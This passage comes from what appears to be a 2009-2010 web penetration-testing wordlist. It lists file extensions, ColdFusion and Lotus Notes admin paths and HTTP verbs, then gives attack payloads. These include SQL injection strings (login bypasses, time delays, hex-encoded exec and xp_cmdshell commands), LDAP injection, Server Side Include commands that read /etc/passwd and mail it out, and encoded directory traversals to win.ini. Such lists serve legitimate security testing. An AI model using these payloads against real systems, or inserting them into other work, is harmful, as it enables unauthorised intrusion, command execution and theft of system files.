.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
